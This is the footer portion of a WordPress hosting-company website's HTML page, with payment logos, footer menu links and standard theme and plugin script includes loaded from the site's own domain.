<li><img alt="" src="http://demo.vegatheme.com/aoxhost/wp-content/uploads/2015/06/payment-logos4.png"></li>
<li><img alt="" src="http://demo.vegatheme.com/aoxhost/wp-content/uploads/2015/06/payment-logos5.png"></li>
<li><img alt="" src="http://demo.vegatheme.com/aoxhost/wp-content/uploads/2015/06/payment-logos6.png"></li>
</ul>
</div></div>
		</div>                                    
                                                    </div>
                    </div>
                </div>
            </div>                                
        </div>
        
        <div class="subfooter">
            <div class="container">
                <div class="row">
                    <div class="col-sm-6">
                        <b>@ 2018 Purehost | All Rights Reserved<sup>TM</sup></b>                                 
                    </div>
                                        <div class="col-sm-6">
                        <div class="menu-footer">
                            <ul id="menu-footer-menu" class=""><li id="menu-item-24" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-24"><a  title="Terms of Service" href="#">Terms of Service</a></li>
<li id="menu-item-25" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25"><a  title="Privacy Policy" href="#">Privacy Policy</a></li>
<li id="menu-item-26" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26"><a  title="Copyright" href="#">Copyright</a></li>
<li id="menu-item-27" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27"><a  title="Site Map" href="#">Site Map</a></li>
</ul>                        </div>
                    </div>
                                    </div>
            </div>
        </div>
    </footer>
    <!-- footer close -->
	
</div><!-- #wrapper -->
	
<script type='text/javascript' src='http://purehostbd.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/purehostbd.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.5'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/bootstrap.min.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/jquery.fitvids.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/jquery.prettyPhoto.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/easing.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/jquery.ui.totop.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/selectnav.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/ender.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/owl.carousel.min.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/custom.js?ver=4.9.10'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var newsletter = {"messages":{"email_error":"Email address is not correct","name_error":"Name is required","surname_error":"Last name is required","privacy_error":"You must accept the privacy policy"},"profile_max":"20"};
/* ]]> */
</script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/plugins/newsletter/subscription/validate.js?ver=5.7.9'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script>
</body>
</html>
<!-- Page generated by LiteSpeed Cache 2.9.8 on 2019-07-22 09:39:59 -->